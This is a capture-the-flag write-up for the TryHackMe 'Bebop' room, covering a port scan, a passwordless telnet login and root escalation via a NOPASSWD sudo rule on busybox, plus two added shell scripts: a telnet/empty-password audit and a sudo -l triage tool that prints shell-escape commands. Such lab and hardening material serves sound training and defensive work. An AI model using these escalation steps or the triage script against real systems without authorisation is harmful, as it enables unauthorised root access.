Bebop
The Bebop room is a free, easy room created by tryhackme and ar33zy. The room is themed around compromising a drone, hence the tagline “Who thought making a flying shell was a good idea?”.
The room requires one to exploit the machine's existing weaknesses to not only find two flags (the user and root flags) but also answer a series of questions about the low-privilege user account, the binary used to escalate privileges, the service that provided initial entry, and the operating system of the “drone”.
Task 0.1 - Connect to our network and start up the machine
For the purposes of this guide, we shall configure a few variables to represent the victim and attacker IPs. TryHackMe assigns a new address each time the machine is deployed, which is why the captured output further down shows a different victim IP than the one set here.
# One should change the below IPs to match their environment
> victim=10.10.179.208 # The IP of the victim's machine (shown on the room page after deployment).
> attacker=10.17.69.220 # The IP of our attacking machine (the VPN address, check with ip addr).
Task 1 - Takeoff!
This requires us to deploy the machine and answer the question of the codename. The clue for this is in the write-up for this task. You will need this codename for the next task.
Task 2 - Manouvre
We will need to identify what services are running on the drone. We can start with a simple port scan against the IP TryHackMe shows for the deployed machine; rustscan finds the open ports quickly and then hands them to nmap for service identification.
> rustscan -a $victim
Open 10.10.216.132:22
Open 10.10.216.132:23
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
... [REDACTED for brevity]
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
23/tcp open telnet syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
From the scan, we notice that only two services are exposed:
- ssh on port 22.
- telnet on port 23.
Both are remote login services, but telnet carries the login name, the password and the whole session in cleartext, so it is the obvious first target. We can telnet to the port and, when asked for a login name, try the codename that we discovered in the previous task.
> telnet $victim
Trying 10.10.216.132...
Connected to 10.10.216.132.
Escape character is '^]'.
login: pilot
Last login: Sat Oct 5 23:48:53 from cpc147224-roth10-2-0-cust456.17-1.cable.virginm.net
FreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr 4 02:07:22 UTC 2019
Welcome to FreeBSD!
...[REDACTED for brevity]
Edit /etc/motd to change this login announcement.
If you `set watch = (0 any any)' in tcsh, you will be notified when
someone logs in or out of your system.
[CODENAME@freebsd ~]$
# Let's list the contents of the home directory and see whether we can find the user flag.
> ls
user.txt
> cat user.txt
[USER FLAG HERE]
The login succeeds without ever prompting for a password, and the user flag sits right in the home directory. Anyone who can reach port 23 and guess the codename gets the same shell, with nothing to sniff or crack.
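The two conditions behind that password-free telnet login are worth being able to check for on a host you administer. The script below is an added example and is not code from the write-up or the room: it audits a FreeBSD-style inetd.conf for an enabled telnet service and a master.passwd file for accounts whose password field is empty, which is one way a login can succeed with no prompt (assumption: the room's machine may reach the same effect by other means). Both inputs are constructed samples in the real file layouts.

```shell
#!/bin/sh
# Added example, not code from the original write-up: audit a FreeBSD host for
# the combination abused above, a cleartext telnet service enabled in inetd and
# an account that needs no password. Both inputs below are constructed samples.

# inetd.conf(5) layout: service socket proto wait user program args
# A leading '#' disables the entry.
SAMPLE_INETD_CONF='#ftp    stream  tcp     nowait  root    /usr/libexec/ftpd       ftpd -l
telnet  stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
#shell  stream  tcp     nowait  root    /usr/libexec/rshd       rshd'

# master.passwd(5) layout: name:pw:uid:gid:class:change:expire:gecos:home:shell
# An empty pw field means no password is required; "*" locks the account.
SAMPLE_MASTER_PASSWD='root:$6$abc$hashhashhash:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
pilot::1001:1001::0:0:pilot:/home/pilot:/bin/sh
ar33zy:$6$xyz$anotherhash:1002:1002::0:0:User &:/home/ar33zy:/bin/sh'

# enabled_inetd_services: print the service name of every active inetd.conf entry on stdin
enabled_inetd_services() {
    awk '!/^[ \t]*#/ && NF >= 6 { print $1 }'
}

# passwordless_accounts: print accounts on stdin whose password field is empty and
# whose shell is interactive (a nologin/false shell cannot be used even without a password)
passwordless_accounts() {
    awk -F: '
        /^#/ || NF < 10 { next }
        $2 == "" && $10 !~ /nologin|\/bin\/false/ { print $1 }
    '
}

# cleartext_login_exposure: prints 1 when telnet is enabled AND at least one account
# has no password, i.e. the exact combination abused above; prints 0 otherwise.
# Arguments: the inetd.conf text and the master.passwd text.
cleartext_login_exposure() {
    inetd=$1
    passwd=$2
    if printf '%s\n' "$inetd" | enabled_inetd_services | grep -qx telnet &&
       [ -n "$(printf '%s\n' "$passwd" | passwordless_accounts)" ]; then
        echo 1
    else
        echo 0
    fi
}

# On a live FreeBSD host feed the real files instead of the samples, e.g.
#   enabled_inetd_services < /etc/inetd.conf
#   passwordless_accounts  < /etc/master.passwd   (readable by root only)
printf 'enabled inetd services: %s\n' "$(printf '%s\n' "$SAMPLE_INETD_CONF" | enabled_inetd_services)"
printf 'passwordless accounts:  %s\n' "$(printf '%s\n' "$SAMPLE_MASTER_PASSWD" | passwordless_accounts)"
printf 'exposed to cleartext passwordless login: %s\n' "$(cleartext_login_exposure "$SAMPLE_INETD_CONF" "$SAMPLE_MASTER_PASSWD")"
```

The fix on a real host is the obvious one: comment out the telnet line in /etc/inetd.conf (or disable inetd entirely and use ssh), and give every interactive account a password or lock it with `*`. The check reads the files rather than probing the network, so it works as a post-exploitation triage step from the pilot shell as well as a hardening audit.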
To find the root flag, we will need a privilege-escalation path from pilot to root. In finding it, I followed the pathway below:
- Listed the commands I can run through sudo using sudo -l. It's clear that I can run busybox as root without a password.
- Visited gtfobins to find how this binary can be abused under sudo. busybox bundles a shell applet, so running it through sudo with sh as the argument gives a shell that inherits the root privileges sudo grants.
- As root, I can search the system for the root flag and complete the challenge.
> sudo -l
User pilot may run the following commands on freebsd:
(root) NOPASSWD: /usr/local/bin/busybox
> sudo busybox sh
#   # The prompt changes from $ to #: busybox's sh applet is now running as root.
> find / -type f -user root -name "root.txt" 2>/dev/null
/root/root.txt
> cat /root/root.txt
[ROOT FLAG HERE]
## NOTE: The last two commands above can be done in one line as below
> find / -type f -user root -name "root.txt" -exec cat {} \; 2>/dev/null
[ROOT FLAG HERE]
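The sudo -l step is the one worth automating, both from the attacker side (which rule to try first) and as a hardening check on your own hosts. The script below is an added example and is not code from the write-up or the room: it parses sudo -l output for NOPASSWD rules, keeps the ones whose binary is a known shell spawner, and prints the command to try for each hit. The sudo -l text is a constructed sample in sudo's real output layout, and the spawner list is a small hand-picked subset of what GTFOBins documents, not an exhaustive one.

```shell
#!/bin/sh
# Added example, not code from the original write-up: triage `sudo -l` output for
# NOPASSWD rules on binaries that hand back a shell. The sample output below is
# constructed; the spawner list is a small subset of GTFOBins' "sudo" entries.

SAMPLE_SUDO_L='Matching Defaults entries for pilot on freebsd:
    env_reset, mail_badpass

User pilot may run the following commands on freebsd:
    (root) NOPASSWD: /usr/local/bin/busybox
    (root) /usr/bin/less
    (ALL : ALL) NOPASSWD: /usr/local/sbin/nginx, /usr/bin/find'

# Binaries whose sudo rule is as good as a root shell (hand-picked subset of GTFOBins)
SHELL_SPAWNERS='busybox sh bash csh tcsh zsh vim vi less more find awk perl python python3 env'

# nopasswd_rules: print "runas<TAB>path" for every command in every NOPASSWD rule
# read from sudo -l output on stdin (a rule may list several commands separated by commas)
nopasswd_rules() {
    awk '
        /NOPASSWD:/ {
            runas = $0; sub(/^[ \t]*\(/, "", runas); sub(/\).*/, "", runas)
            path  = $0; sub(/.*NOPASSWD:[ \t]*/, "", path)
            n = split(path, cmds, /,[ \t]*/)
            for (i = 1; i <= n; i++) print runas "\t" cmds[i]
        }'
}

# shell_spawning_rules: keep only the NOPASSWD rules whose binary is a known shell spawner
shell_spawning_rules() {
    tab=$(printf '\t')
    nopasswd_rules | while IFS="$tab" read -r runas path; do
        base=${path##*/}
        for s in $SHELL_SPAWNERS; do
            if [ "$base" = "$s" ]; then
                printf '%s\t%s\n' "$runas" "$path"
                break
            fi
        done
    done
    return 0
}

# escalation_hint: the command to try for a hit, as the write-up does with busybox;
# for binaries not spelled out here point at the GTFOBins page for that name
escalation_hint() {
    base=${1##*/}
    case $base in
        busybox)              echo "sudo $1 sh" ;;
        sh|bash|csh|tcsh|zsh) echo "sudo $1" ;;
        vim|vi)               echo "sudo $1 -c ':!/bin/sh'" ;;
        *)                    echo "see https://gtfobins.github.io/gtfobins/$base/" ;;
    esac
}

# On a live host replace the sample with:  sudo -n -l 2>/dev/null | shell_spawning_rules
printf '%s\n' "$SAMPLE_SUDO_L" | shell_spawning_rules | while IFS="$(printf '\t')" read -r runas path; do
    printf 'runs as %s without a password: %s -> %s\n' "$runas" "$path" "$(escalation_hint "$path")"
done
```

On the sample this flags busybox (run as root) and find (run as anyone), and skips less because its rule still requires a password and nginx because it is not a shell spawner. The busybox hit is exactly the rule abused above with sudo busybox sh; the defensive reading is that any NOPASSWD rule on a binary in this list should be removed from sudoers, since restricting "which binary" does nothing when the binary itself can exec a shell.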
Task 3 - Quiz!
The above two tasks have given us enough information to answer the questions that follow:
- What is the low privilege user? - The codename that you discovered, which is also the login name you gave to telnet.
- What binary was used to escalate privileges? - From the sudo -l output.
- What service was used to gain initial shell access? - Refer to the port scan output and the login above.
- What Operating System does the drone use? - Refer to the banner printed by the console when you logged into the drone through the initial service.
Task 4 - Conclusion
Watch the DEFCON 23 talk and enjoy the story!